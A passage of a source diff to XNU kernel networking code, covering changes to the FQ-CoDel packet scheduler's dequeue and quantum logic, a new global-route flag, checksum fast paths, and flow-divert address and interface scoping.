u_int32_t maxpktcnt, IFCQ_LOCK_ASSERT_HELD(ifq); fqs = (fq_if_t *)ifq->ifcq_disc; + STAILQ_INIT(&fq_dqlist_head); switch (fqs->fqs_ptype) { case QP_MBUF: @@ -381,7 +473,8 @@ fq_if_dequeue_classq_multi(struct ifclassq *ifq, u_int32_t maxpktcnt, } for 
(;;) { - classq_pkt_t top = CLASSQ_PKT_INITIALIZER(top); + uint32_t pktcnt = 0, bytecnt = 0; + classq_pkt_t head = CLASSQ_PKT_INITIALIZER(head); classq_pkt_t tail = CLASSQ_PKT_INITIALIZER(tail); if (fqs->fqs_bitmaps[FQ_IF_ER] == 0 && @@ -419,26 +512,22 @@ fq_if_dequeue_classq_multi(struct ifclassq *ifq, u_int32_t maxpktcnt, } } fq_if_dequeue(fqs, fq_cl, (maxpktcnt - total_pktcnt), - (maxbytecnt - total_bytecnt), &top, &tail, &pktcnt, - &bytecnt, FALSE); - if (top.cp_mbuf != NULL) { - ASSERT(pktcnt > 0 && bytecnt > 0); + (maxbytecnt - total_bytecnt), &head, &tail, &pktcnt, + &bytecnt, &fq_dqlist_head, FALSE); + if (head.cp_mbuf != NULL) { + ASSERT(STAILQ_EMPTY(&fq_dqlist_head)); if (first.cp_mbuf == NULL) { - first = top; - total_pktcnt = pktcnt; - total_bytecnt = bytecnt; + first = head; } else { ASSERT(last.cp_mbuf != NULL); - append_pkt(&last, &top); - total_pktcnt += pktcnt; - total_bytecnt += bytecnt; + append_pkt(&last, &head); } last = tail; append_pkt(&last, &tmp); - fq_cl->fcl_budget -= bytecnt; - pktcnt = 0; - bytecnt = 0; } + fq_cl->fcl_budget -= bytecnt; + total_pktcnt += pktcnt; + total_bytecnt += bytecnt; /* * If the class has exceeded the budget but still has data @@ -464,6 +553,8 @@ state_change: } } + fq_dqlist_get_packet_list(&fq_dqlist_head, &first, &last); + if (__probable(first_packet != NULL)) { *first_packet = first; } @@ -493,6 +584,7 @@ fq_if_dequeue_sc_classq_multi(struct ifclassq *ifq, mbuf_svc_class_t svc, classq_pkt_t first = CLASSQ_PKT_INITIALIZER(fisrt); classq_pkt_t last = CLASSQ_PKT_INITIALIZER(last); fq_if_append_pkt_t append_pkt; + flowq_dqlist_t fq_dqlist_head; switch (fqs->fqs_ptype) { case QP_MBUF: @@ -506,6 +598,7 @@ fq_if_dequeue_sc_classq_multi(struct ifclassq *ifq, mbuf_svc_class_t svc, __builtin_unreachable(); } + STAILQ_INIT(&fq_dqlist_head); pri = fq_if_service_to_priority(fqs, svc); fq_cl = &fqs->fqs_classq[pri]; /* @@ -515,28 +608,28 @@ fq_if_dequeue_sc_classq_multi(struct ifclassq *ifq, mbuf_svc_class_t svc, */ while 
(total_pktcnt < maxpktcnt && total_bytecnt < maxbytecnt && fq_cl->fcl_stat.fcl_pkt_cnt > 0) { - classq_pkt_t top = CLASSQ_PKT_INITIALIZER(top); + classq_pkt_t head = CLASSQ_PKT_INITIALIZER(head); classq_pkt_t tail = CLASSQ_PKT_INITIALIZER(tail); u_int32_t pktcnt = 0, bytecnt = 0; fq_if_dequeue(fqs, fq_cl, (maxpktcnt - total_pktcnt), - (maxbytecnt - total_bytecnt), &top, &tail, &pktcnt, - &bytecnt, TRUE); - if (top.cp_mbuf != NULL) { + (maxbytecnt - total_bytecnt), &head, &tail, &pktcnt, + &bytecnt, &fq_dqlist_head, TRUE); + if (head.cp_mbuf != NULL) { if (first.cp_mbuf == NULL) { - first = top; - total_pktcnt = pktcnt; - total_bytecnt = bytecnt; + first = head; } else { ASSERT(last.cp_mbuf != NULL); - append_pkt(&last, &top); - total_pktcnt += pktcnt; - total_bytecnt += bytecnt; + append_pkt(&last, &head); } last = tail; } + total_pktcnt += pktcnt; + total_bytecnt += bytecnt; } + fq_dqlist_get_packet_list(&fq_dqlist_head, &first, &last); + if (__probable(first_packet != NULL)) { *first_packet = first; } @@ -581,10 +674,10 @@ fq_if_purge_flow(fq_if_t *fqs, fq_t *fq, u_int32_t *pktsp, if (fq->fq_flags & FQF_NEW_FLOW) { fq_if_empty_new_flow(fq, fq_cl, false); } else if (fq->fq_flags & FQF_OLD_FLOW) { - fq_if_empty_old_flow(fqs, fq_cl, fq, false); + fq_if_empty_old_flow(fqs, fq_cl, fq, false, true); } - fq_if_destroy_flow(fqs, fq_cl, fq); + fq_if_destroy_flow(fqs, fq_cl, fq, true); if (FQ_IF_CLASSQ_IDLE(fq_cl)) { int i; @@ -663,6 +756,78 @@ fq_if_purge_sc(fq_if_t *fqs, cqrq_purge_sc_t *req) } } +static uint16_t +fq_if_calc_quantum(struct ifnet *ifp) +{ + uint16_t quantum; + + switch (ifp->if_family) { + case IFNET_FAMILY_ETHERNET: + VERIFY((ifp->if_mtu + ETHER_HDR_LEN) <= UINT16_MAX); + quantum = (uint16_t)ifp->if_mtu + ETHER_HDR_LEN; + break; + + case IFNET_FAMILY_CELLULAR: + case IFNET_FAMILY_IPSEC: + case IFNET_FAMILY_UTUN: + VERIFY(ifp->if_mtu <= UINT16_MAX); + quantum = (uint16_t)ifp->if_mtu; + break; + + default: + quantum = FQ_CODEL_DEFAULT_QUANTUM; + break; + } 
+ + /* + * XXX: Skywalk native interface doesn't support HW TSO offload. + */ + if (((ifp->if_eflags & IFEF_SKYWALK_NATIVE) == 0) && + ((ifp->if_hwassist & IFNET_TSOF) != 0)) { + VERIFY(ifp->if_tso_v4_mtu <= UINT16_MAX); + VERIFY(ifp->if_tso_v6_mtu <= UINT16_MAX); + quantum = (uint16_t)MAX(ifp->if_tso_v4_mtu, ifp->if_tso_v6_mtu); + quantum = (quantum != 0) ? quantum : IF_MAXMTU; + } + + quantum = MAX(FQ_CODEL_DEFAULT_QUANTUM, quantum); +#if DEBUG || DEVELOPMENT + quantum = (fq_codel_quantum != 0) ? fq_codel_quantum : quantum; +#endif /* DEBUG || DEVELOPMENT */ + return quantum; +} + +static void +fq_if_mtu_update(fq_if_t *fqs) +{ +#define _FQ_CLASSQ_UPDATE_QUANTUM(_fqs, _s, _q) \ + (_fqs)->fqs_classq[FQ_IF_ ## _s ## _INDEX].fcl_quantum = \ + FQ_CODEL_QUANTUM_ ## _s(_q) + + uint16_t quantum; + + quantum = fq_if_calc_quantum(fqs->fqs_ifq->ifcq_ifp); + + if ((fqs->fqs_flags & FQS_DRIVER_MANAGED) != 0) { + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BK, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BE, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, VI, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, VO, quantum); + } else { + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BK_SYS, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BK, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BE, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, RD, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, OAM, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, AV, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, RV, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, VI, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, VO, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, CTL, quantum); + } +#undef _FQ_CLASSQ_UPDATE_QUANTUM +} + static void fq_if_event(fq_if_t *fqs, cqev_t ev) { @@ -673,6 +838,9 @@ fq_if_event(fq_if_t *fqs, cqev_t ev) case CLASSQ_EV_LINK_DOWN: fq_if_purge(fqs); break; + case CLASSQ_EV_LINK_MTU: + fq_if_mtu_update(fqs); + break; default: break; } @@ -782,8 +950,14 @@ fq_if_setup_ifclassq(struct ifclassq *ifq, u_int32_t flags, classq_pkt_type_t ptype) { #pragma unused(flags) 
+#define _FQ_CLASSQ_INIT(_fqs, _s, _q) \ + fq_if_classq_init((_fqs), FQ_IF_ ## _s ## _INDEX, \ + FQ_CODEL_QUANTUM_ ## _s(_q), FQ_CODEL_DRR_MAX_ ## _s, \ + MBUF_SC_ ## _s ) + struct ifnet *ifp = ifq->ifcq_ifp; fq_if_t *fqs = NULL; + uint16_t quantum; int err = 0; IFCQ_LOCK_ASSERT_HELD(ifq); @@ -795,51 +969,39 @@ fq_if_setup_ifclassq(struct ifclassq *ifq, u_int32_t flags, return ENOMEM; } + quantum = fq_if_calc_quantum(ifp); + if (flags & PKTSCHEDF_QALG_DRIVER_MANAGED) { fqs->fqs_flags |= FQS_DRIVER_MANAGED; - fq_if_classq_init(fqs, FQ_IF_BK_INDEX, 1500, - 2, MBUF_SC_BK); - fq_if_classq_init(fqs, FQ_IF_BE_INDEX, 1500, - 4, MBUF_SC_BE); - fq_if_classq_init(fqs, FQ_IF_VI_INDEX, 3000, - 6, MBUF_SC_VI); - fq_if_classq_init(fqs, FQ_IF_VO_INDEX, 600, - 8, MBUF_SC_VO); + _FQ_CLASSQ_INIT(fqs, BK, quantum); + _FQ_CLASSQ_INIT(fqs, BE, quantum); + _FQ_CLASSQ_INIT(fqs, VI, quantum); + _FQ_CLASSQ_INIT(fqs, VO, quantum); } else { /* SIG shares same INDEX with VI */ _CASSERT(SCIDX_SIG == SCIDX_VI); _CASSERT(FQ_IF_SIG_INDEX == FQ_IF_VI_INDEX); - fq_if_classq_init(fqs, FQ_IF_BK_SYS_INDEX, 1500, - 2, MBUF_SC_BK_SYS); - fq_if_classq_init(fqs, FQ_IF_BK_INDEX, 1500, - 2, MBUF_SC_BK); - fq_if_classq_init(fqs, FQ_IF_BE_INDEX, 1500, - 4, MBUF_SC_BE); - fq_if_classq_init(fqs, FQ_IF_RD_INDEX, 1500, - 4, MBUF_SC_RD); - fq_if_classq_init(fqs, FQ_IF_OAM_INDEX, 1500, - 4, MBUF_SC_OAM); - fq_if_classq_init(fqs, FQ_IF_AV_INDEX, 3000, - 6, MBUF_SC_AV); - fq_if_classq_init(fqs, FQ_IF_RV_INDEX, 3000, - 6, MBUF_SC_RV); - fq_if_classq_init(fqs, FQ_IF_VI_INDEX, 3000, - 6, MBUF_SC_VI); - fq_if_classq_init(fqs, FQ_IF_VO_INDEX, 600, - 8, MBUF_SC_VO); - fq_if_classq_init(fqs, FQ_IF_CTL_INDEX, 600, - 8, MBUF_SC_CTL); + _FQ_CLASSQ_INIT(fqs, BK_SYS, quantum); + _FQ_CLASSQ_INIT(fqs, BK, quantum); + _FQ_CLASSQ_INIT(fqs, BE, quantum); + _FQ_CLASSQ_INIT(fqs, RD, quantum); + _FQ_CLASSQ_INIT(fqs, OAM, quantum); + _FQ_CLASSQ_INIT(fqs, AV, quantum); + _FQ_CLASSQ_INIT(fqs, RV, quantum); + _FQ_CLASSQ_INIT(fqs, VI, 
quantum); + _FQ_CLASSQ_INIT(fqs, VO, quantum); + _FQ_CLASSQ_INIT(fqs, CTL, quantum); } err = ifclassq_attach(ifq, PKTSCHEDT_FQ_CODEL, fqs); - if (err != 0) { - printf("%s: error from ifclassq_attach, " + os_log_error(OS_LOG_DEFAULT, "%s: error from ifclassq_attach, " "failed to attach fq_if: %d\n", __func__, err); fq_if_destroy(fqs); } return err; +#undef _FQ_CLASSQ_INIT } fq_t * @@ -893,7 +1055,8 @@ fq_if_hash_pkt(fq_if_t *fqs, u_int32_t flowid, mbuf_svc_class_t svc_class, } void -fq_if_destroy_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq) +fq_if_destroy_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq, + bool destroy_now) { u_int8_t hash_id; hash_id = FQ_IF_FLOW_HASH_ID(fq->fq_flowhash); @@ -901,7 +1064,10 @@ fq_if_destroy_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq) fq_hashlink); fq_cl->fcl_stat.fcl_flows_cnt--; IFCQ_CONVERT_LOCK(fqs->fqs_ifq); - fq_destroy(fq); + fq->fq_flags |= FQF_DESTROYED; + if (destroy_now) { + fq_destroy(fq); + } } inline boolean_t @@ -913,7 +1079,7 @@ fq_if_at_drop_limit(fq_if_t *fqs) static void fq_if_empty_old_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq, - bool remove_hash) + bool remove_hash, bool destroy) { /* * Remove the flow queue if it is empty @@ -927,7 +1093,7 @@ fq_if_empty_old_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq, if (remove_hash) { /* Remove from the hash list */ - fq_if_destroy_flow(fqs, fq_cl, fq); + fq_if_destroy_flow(fqs, fq_cl, fq, destroy); } } @@ -986,7 +1152,7 @@ fq_if_drop_packet(fq_if_t *fqs) if (fq_empty(fq)) { fqs->fqs_large_flow = NULL; if (fq->fq_flags & FQF_OLD_FLOW) { - fq_if_empty_old_flow(fqs, fq_cl, fq, true); + fq_if_empty_old_flow(fqs, fq_cl, fq, true, true); } else { VERIFY(fq->fq_flags & FQF_NEW_FLOW); fq_if_empty_new_flow(fq, fq_cl, true); @@ -1024,14 +1190,21 @@ fq_if_is_flow_heavy(fq_if_t *fqs, fq_t *fq) } boolean_t -fq_if_add_fcentry(fq_if_t *fqs, pktsched_pkt_t *pkt, uint32_t flowid, - uint8_t flowsrc, fq_if_classq_t *fq_cl) +fq_if_add_fcentry(fq_if_t *fqs, 
pktsched_pkt_t *pkt, uint8_t flowsrc, + fq_t *fq, fq_if_classq_t *fq_cl) { struct flowadv_fcentry *fce; +#if DEBUG || DEVELOPMENT + if (__improbable(ifclassq_flow_control_adv == 0)) { + os_log(OS_LOG_DEFAULT, "%s: skipped flow control", __func__); + return TRUE; + } +#endif /* DEBUG || DEVELOPMENT */ + STAILQ_FOREACH(fce, &fqs->fqs_fclist, fce_link) { if ((uint8_t)fce->fce_flowsrc_type == flowsrc && - fce->fce_flowid == flowid) { + fce->fce_flowid == fq->fq_flowhash) { /* Already on flowcontrol list */ return TRUE; } @@ -1042,6 +1215,11 @@ fq_if_add_fcentry(fq_if_t *fqs, pktsched_pkt_t *pkt, uint32_t flowid, /* XXX Add number of bytes in the queue */ STAILQ_INSERT_TAIL(&fqs->fqs_fclist, fce, fce_link); fq_cl->fcl_stat.fcl_flow_control++; + os_log(OS_LOG_DEFAULT, "%s: num: %d, scidx: %d, flowsrc: %d, " + "flow: 0x%x, iface: %s\n", __func__, + fq_cl->fcl_stat.fcl_flow_control, + fq->fq_sc_index, fce->fce_flowsrc_type, fq->fq_flowhash, + if_name(fqs->fqs_ifq->ifcq_ifp)); } return (fce != NULL) ? 
TRUE : FALSE; } @@ -1061,23 +1239,30 @@ fq_if_flow_feedback(fq_if_t *fqs, fq_t *fq, fq_if_classq_t *fq_cl) STAILQ_REMOVE(&fqs->fqs_fclist, fce, flowadv_fcentry, fce_link); STAILQ_NEXT(fce, fce_link) = NULL; - flowadv_add_entry(fce); fq_cl->fcl_stat.fcl_flow_feedback++; + os_log(OS_LOG_DEFAULT, "%s: num: %d, scidx: %d, flowsrc: %d, " + "flow: 0x%x, iface: %s\n", __func__, + fq_cl->fcl_stat.fcl_flow_feedback, fq->fq_sc_index, + fce->fce_flowsrc_type, fce->fce_flowid, + if_name(fqs->fqs_ifq->ifcq_ifp)); + flowadv_add_entry(fce); } fq->fq_flags &= ~FQF_FLOWCTL_ON; } void fq_if_dequeue(fq_if_t *fqs, fq_if_classq_t *fq_cl, uint32_t pktlimit, - int64_t bytelimit, classq_pkt_t *top, classq_pkt_t *tail, - uint32_t *retpktcnt, uint32_t *retbytecnt, boolean_t drvmgmt) + int64_t bytelimit, classq_pkt_t *top, classq_pkt_t *bottom, + uint32_t *retpktcnt, uint32_t *retbytecnt, flowq_dqlist_t *fq_dqlist, + boolean_t drvmgmt) { fq_t *fq = NULL, *tfq = NULL; flowq_stailq_t temp_stailq; - u_int32_t pktcnt, bytecnt; + uint32_t pktcnt, bytecnt; boolean_t qempty, limit_reached = FALSE; classq_pkt_t last = CLASSQ_PKT_INITIALIZER(last); fq_getq_flow_t fq_getq_flow_fn; + classq_pkt_t *head, *tail; switch (fqs->fqs_ptype) { case QP_MBUF: @@ -1107,8 +1292,20 @@ fq_if_dequeue(fq_if_t *fqs, fq_if_classq_t *fq_cl, uint32_t pktlimit, ASSERT((fq->fq_flags & (FQF_NEW_FLOW | FQF_OLD_FLOW)) == FQF_NEW_FLOW); + if (fq_dqlist != NULL) { + if (!fq->fq_in_dqlist) { + fq_dqlist_add(fq_dqlist, fq); + } + head = &fq->fq_dq_head; + tail = &fq->fq_dq_tail; + } else { + ASSERT(!fq->fq_in_dqlist); + head = top; + tail = &last; + } + limit_reached = fq_getq_flow_fn(fqs, fq_cl, fq, bytelimit, - pktlimit, top, &last, &bytecnt, &pktcnt, &qempty, + pktlimit, head, tail, &bytecnt, &pktcnt, &qempty, PKTF_NEW_FLOW); if (fq->fq_deficit <= 0 || qempty) { @@ -1123,12 +1320,26 @@ fq_if_dequeue(fq_if_t *fqs, fq_if_classq_t *fq_cl, uint32_t pktlimit, STAILQ_FOREACH_SAFE(fq, &fq_cl->fcl_old_flows, fq_actlink, tfq) { 
VERIFY((fq->fq_flags & (FQF_NEW_FLOW | FQF_OLD_FLOW)) == FQF_OLD_FLOW); + bool destroy = true; + + if (fq_dqlist != NULL) { + if (!fq->fq_in_dqlist) { + fq_dqlist_add(fq_dqlist, fq); + } + head = &fq->fq_dq_head; + tail = &fq->fq_dq_tail; + destroy = false; + } else { + ASSERT(!fq->fq_in_dqlist); + head = top; + tail = &last; + } limit_reached = fq_getq_flow_fn(fqs, fq_cl, fq, bytelimit, - pktlimit, top, &last, &bytecnt, &pktcnt, &qempty, 0); + pktlimit, head, tail, &bytecnt, &pktcnt, &qempty, 0); if (qempty) { - fq_if_empty_old_flow(fqs, fq_cl, fq, true); + fq_if_empty_old_flow(fqs, fq_cl, fq, true, destroy); } else if (fq->fq_deficit <= 0) { STAILQ_REMOVE(&fq_cl->fcl_old_flows, fq, flowq, fq_actlink); @@ -1151,19 +1362,18 @@ done: } else if (!STAILQ_EMPTY(&temp_stailq)) { fq_cl->fcl_old_flows = temp_stailq; } - if (last.cp_mbuf != NULL) { VERIFY(top->cp_mbuf != NULL); - if (tail != NULL) { - *tail = last; - } - if (retpktcnt != NULL) { - *retpktcnt = pktcnt; - } - if (retbytecnt != NULL) { - *retbytecnt = bytecnt; + if (bottom != NULL) { + *bottom = last; } } + if (retpktcnt != NULL) { + *retpktcnt = pktcnt; + } + if (retbytecnt != NULL) { + *retbytecnt = bytecnt; + } } void diff --git a/bsd/net/pktsched/pktsched_fq_codel.h b/bsd/net/pktsched/pktsched_fq_codel.h index ce05193bc..4228b6e80 100644 --- a/bsd/net/pktsched/pktsched_fq_codel.h +++ b/bsd/net/pktsched/pktsched_fq_codel.h @@ -212,8 +212,8 @@ extern struct flowq *fq_if_hash_pkt(fq_if_t *, u_int32_t, mbuf_svc_class_t, extern boolean_t fq_if_at_drop_limit(fq_if_t *); extern void fq_if_drop_packet(fq_if_t *); extern void fq_if_is_flow_heavy(fq_if_t *, struct flowq *); -extern boolean_t fq_if_add_fcentry(fq_if_t *, pktsched_pkt_t *, uint32_t, - uint8_t, fq_if_classq_t *); +extern boolean_t fq_if_add_fcentry(fq_if_t *, pktsched_pkt_t *, uint8_t, + struct flowq *, fq_if_classq_t *); extern void fq_if_flow_feedback(fq_if_t *, struct flowq *, fq_if_classq_t *); extern int fq_if_setup_ifclassq(struct ifclassq *ifq, 
u_int32_t flags, classq_pkt_type_t ptype); @@ -221,7 +221,7 @@ extern void fq_if_teardown_ifclassq(struct ifclassq *ifq); extern int fq_if_getqstats_ifclassq(struct ifclassq *ifq, u_int32_t qid, struct if_ifclassq_stats *ifqs); extern void fq_if_destroy_flow(fq_if_t *, fq_if_classq_t *, - struct flowq *); + struct flowq *, bool); #endif /* BSD_KERNEL_PRIVATE */ diff --git a/bsd/net/radix.c b/bsd/net/radix.c index c9ea3960c..a9745cb42 100644 --- a/bsd/net/radix.c +++ b/bsd/net/radix.c @@ -95,9 +95,6 @@ static char normal_chars[] = {0, 0x80, 0xc0, 0xe0, 0xf0, 0xf8, 0xfc, 0xfe, -1}; static char *rn_zeros, *rn_ones; -extern lck_grp_t *domain_proto_mtx_grp; -extern lck_attr_t *domain_proto_mtx_attr; - #define rn_masktop (mask_rnhead->rnh_treetop) #undef Bcmp #define Bcmp(a, b, l) \ diff --git a/bsd/net/route.c b/bsd/net/route.c index a31e25bb6..91000a4ee 100644 --- a/bsd/net/route.c +++ b/bsd/net/route.c @@ -1847,6 +1847,14 @@ rtrequest_common_locked(int req, struct sockaddr *dst0, int, flags, unsigned int, ifscope); LCK_MTX_ASSERT(rnh_lock, LCK_MTX_ASSERT_OWNED); + +#if !(DEVELOPMENT || DEBUG) + /* + * Setting the global internet flag external is only for testing + */ + flags &= ~RTF_GLOBAL; +#endif /* !(DEVELOPMENT || DEBUG) */ + /* * Find the correct routing tree to use for this Address Family */ @@ -2342,6 +2350,16 @@ makeroute: * necp client watchers to re-evaluate */ if (SA_DEFAULT(rt_key(rt))) { + /* + * Mark default routes as (potentially) leading to the global internet + * this can be used for policy decisions. + * The clone routes will inherit this flag. + * We check against the host flag as this works for default routes that have + * a gateway and defaults routes when all subnets are local. 
+ */ + if (req == RTM_ADD && (rt->rt_flags & RTF_HOST) == 0) { + rt->rt_flags |= RTF_GLOBAL; + } if (rt->rt_ifp != NULL) { ifnet_touch_lastupdown(rt->rt_ifp); } diff --git a/bsd/net/route.h b/bsd/net/route.h index 613d61709..42cec6fab 100644 --- a/bsd/net/route.h +++ b/bsd/net/route.h @@ -314,7 +314,8 @@ extern int route_op_entitlement_check(struct socket *, kauth_cred_t, int, boolea #define RTF_PROXY 0x8000000 /* proxying, no interface scope */ #define RTF_ROUTER 0x10000000 /* host is a router */ #define RTF_DEAD 0x20000000 /* Route entry is being freed */ - /* 0x40000000 and up unassigned */ +#define RTF_GLOBAL 0x40000000 /* route to destination of the global internet */ + /* 0x80000000 unassigned */ #define RTPRF_OURS RTF_PROTO3 /* set on routes we manage */ #define RTF_BITS \ @@ -322,7 +323,7 @@ extern int route_op_entitlement_check(struct socket *, kauth_cred_t, int, boolea "\10DELCLONE\11CLONING\12XRESOLVE\13LLINFO\14STATIC\15BLACKHOLE" \ "\16NOIFREF\17PROTO2\20PROTO1\21PRCLONING\22WASCLONED\23PROTO3" \ "\25PINNED\26LOCAL\27BROADCAST\30MULTICAST\31IFSCOPE\32CONDEMNED" \ - "\33IFREF\34PROXY\35ROUTER" + "\33IFREF\34PROXY\35ROUTER\37GLOBAL" #define IS_DIRECT_HOSTROUTE(rt) \ (((rt)->rt_flags & (RTF_HOST | RTF_GATEWAY)) == RTF_HOST) diff --git a/bsd/net/skywalk_stubs.c b/bsd/net/skywalk_stubs.c index f984a3e88..cfeb61b53 100644 --- a/bsd/net/skywalk_stubs.c +++ b/bsd/net/skywalk_stubs.c @@ -156,6 +156,10 @@ STUB(kern_packet_append); STUB(kern_packet_get_next); STUB(kern_packet_set_chain_counts); STUB(kern_packet_get_chain_counts); +STUB(kern_packet_trace_start); +STUB(kern_packet_trace_end); +STUB(kern_packet_is_traced); +STUB(kern_packet_trace_event); STUB(kern_pbufpool_alloc); STUB(kern_pbufpool_alloc_batch); STUB(kern_pbufpool_alloc_batch_callback); diff --git a/bsd/netinet/cpu_in_cksum_gen.c b/bsd/netinet/cpu_in_cksum_gen.c index 2cdb63596..e1cdf126e 100644 --- a/bsd/netinet/cpu_in_cksum_gen.c +++ b/bsd/netinet/cpu_in_cksum_gen.c @@ -108,27 +108,45 @@ uint32_t 
os_cpu_in_cksum(const void *data, uint32_t len, uint32_t initial_sum) { /* - * If data is 4-bytes aligned, length is multiple of 4-bytes, - * and the amount to checksum is small, this would be quicker; - * this is suitable for IPv4 header. + * If data is 4-bytes aligned (conditional), length is multiple + * of 4-bytes (required), and the amount to checksum is small, + * this would be quicker; this is suitable for IPv4/TCP header. */ - if (IS_P2ALIGNED(data, sizeof(uint32_t)) && - len <= 64 && (len & 3) == 0) { + if ( +#if !defined(__arm64__) && !defined(__x86_64__) + IS_P2ALIGNED(data, sizeof(uint32_t)) && +#endif /* !__arm64__ && !__x86_64__ */ + len <= 64 && (len & 3) == 0) { uint8_t *p = __DECONST(uint8_t *, data); uint64_t sum = initial_sum; - if (PREDICT_TRUE(len == 20)) { /* simple IPv4 header */ + switch (len) { + case 20: /* simple IPv4 or TCP header */ sum += *(uint32_t *)(void *)p; sum += *(uint32_t *)(void *)(p + 4); sum += *(uint32_t *)(void *)(p + 8); sum += *(uint32_t *)(void *)(p + 12); sum += *(uint32_t *)(void *)(p + 16); - } else { + break; + + case 32: /* TCP header + timestamp option */ + sum += *(uint32_t *)(void *)p; + sum += *(uint32_t *)(void *)(p + 4); + sum += *(uint32_t *)(void *)(p + 8); + sum += *(uint32_t *)(void *)(p + 12); + sum += *(uint32_t *)(void *)(p + 16); + sum += *(uint32_t *)(void *)(p + 20); + sum += *(uint32_t *)(void *)(p + 24); + sum += *(uint32_t *)(void *)(p + 28); + break; + + default: while (len) { sum += *(uint32_t *)(void *)p; p += 4; len -= 4; } + break; } /* fold 64-bit to 16-bit (deferred carries) */ diff --git a/bsd/netinet/flow_divert.c b/bsd/netinet/flow_divert.c index e278115c2..818eb1bea 100644 --- a/bsd/netinet/flow_divert.c +++ b/bsd/netinet/flow_divert.c @@ -1,5 +1,5 @@ /* - * Copyright (c) 2012-2017, 2020 Apple Inc. All rights reserved. + * Copyright (c) 2012-2017, 2020, 2021 Apple Inc. All rights reserved. 
* * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -80,6 +80,8 @@ #define FLOW_DIVERT_NOTIFY_ON_RECEIVED 0x00000080 #define FLOW_DIVERT_IMPLICIT_CONNECT 0x00000100 #define FLOW_DIVERT_DID_SET_LOCAL_ADDR 0x00000200 +#define FLOW_DIVERT_HAS_TOKEN 0x00000400 +#define FLOW_DIVERT_SHOULD_SET_LOCAL_ADDR 0x00000800 #define FDLOG(level, pcb, format, ...) \ os_log_with_type(OS_LOG_DEFAULT, flow_divert_syslog_type_to_oslog_type(level), "(%u): " format "\n", (pcb)->hash, __VA_ARGS__) @@ -1374,6 +1376,13 @@ flow_divert_send_connect_result(struct flow_divert_pcb *fd_cb) goto done; } + if (fd_cb->local_endpoint.sa.sa_family == AF_INET || fd_cb->local_endpoint.sa.sa_family == AF_INET6) { + error = flow_divert_packet_append_tlv(packet, FLOW_DIVERT_TLV_LOCAL_ADDR, fd_cb->local_endpoint.sa.sa_len, &(fd_cb->local_endpoint.sa)); + if (error) { + goto done; + } + } + error = flow_divert_send_packet(fd_cb, packet, TRUE); if (error) { goto done; @@ -1812,12 +1821,12 @@ done: } static void -flow_divert_set_local_endpoint(struct flow_divert_pcb *fd_cb, struct sockaddr *local_endpoint, bool port_only) +flow_divert_set_local_endpoint(struct flow_divert_pcb *fd_cb, struct sockaddr *local_endpoint) { struct inpcb *inp = sotoinpcb(fd_cb->so); if (local_endpoint->sa_family == AF_INET6) { - if (IN6_IS_ADDR_UNSPECIFIED(&inp->in6p_laddr) && !port_only) { + if (IN6_IS_ADDR_UNSPECIFIED(&inp->in6p_laddr) && (fd_cb->flags & FLOW_DIVERT_SHOULD_SET_LOCAL_ADDR)) { fd_cb->flags |= FLOW_DIVERT_DID_SET_LOCAL_ADDR; inp->in6p_laddr = (satosin6(local_endpoint))->sin6_addr; } @@ -1825,7 +1834,7 @@ flow_divert_set_local_endpoint(struct flow_divert_pcb *fd_cb, struct sockaddr *l inp->inp_lport = (satosin6(local_endpoint))->sin6_port; } } else if (local_endpoint->sa_family == AF_INET) { - if (inp->inp_laddr.s_addr == INADDR_ANY && !port_only) { + if (inp->inp_laddr.s_addr == INADDR_ANY && (fd_cb->flags & FLOW_DIVERT_SHOULD_SET_LOCAL_ADDR)) { fd_cb->flags |= FLOW_DIVERT_DID_SET_LOCAL_ADDR; inp->inp_laddr = 
(satosin(local_endpoint))->sin_addr; } @@ -2032,8 +2041,10 @@ flow_divert_disable(struct flow_divert_pcb *fd_cb) NULL, (last_proc != NULL ? last_proc : current_proc())); - if (error) { + if (error && error != EWOULDBLOCK) { FDLOG(LOG_ERR, fd_cb, "Failed to send queued data using the socket's original protocol: %d", error); + } else { + error = 0; } } else if (SOCK_TYPE(so) == SOCK_DGRAM) { struct sockbuf *sb = &so->so_snd; @@ -2134,6 +2145,78 @@ done: } } +static void +flow_divert_scope(struct flow_divert_pcb *fd_cb, int out_if_index, bool derive_new_address) +{ + struct socket *so = NULL; + struct inpcb *inp = NULL; + struct ifnet *current_ifp = NULL; + struct ifnet *new_ifp = NULL; + int error = 0; + + so = fd_cb->so; + if (so == NULL) { + return; + } + + inp = sotoinpcb(so); + + if (out_if_index <= 0) { + return; + } + + if (inp->inp_vflag & INP_IPV6) { + current_ifp = inp->in6p_last_outifp; + } else { + current_ifp = inp->inp_last_outifp; + } + + if (current_ifp != NULL) { + if (current_ifp->if_index == out_if_index) { + /* No change */ + return; + } + + /* Scope the socket to the given interface */ + error = inp_bindif(inp, out_if_index, &new_ifp); + if (error != 0) { + FDLOG(LOG_ERR, fd_cb, "failed to scope to %d because inp_bindif returned %d", out_if_index, error); + return; + } + + if (derive_new_address && fd_cb->original_remote_endpoint != NULL) { + /* Get the appropriate address for the given interface */ + if (inp->inp_vflag & INP_IPV6) { + inp->in6p_laddr = sa6_any.sin6_addr; + error = in6_pcbladdr(inp, fd_cb->original_remote_endpoint, &(fd_cb->local_endpoint.sin6.sin6_addr), NULL); + } else { + inp->inp_laddr.s_addr = INADDR_ANY; + error = in_pcbladdr(inp, fd_cb->original_remote_endpoint, 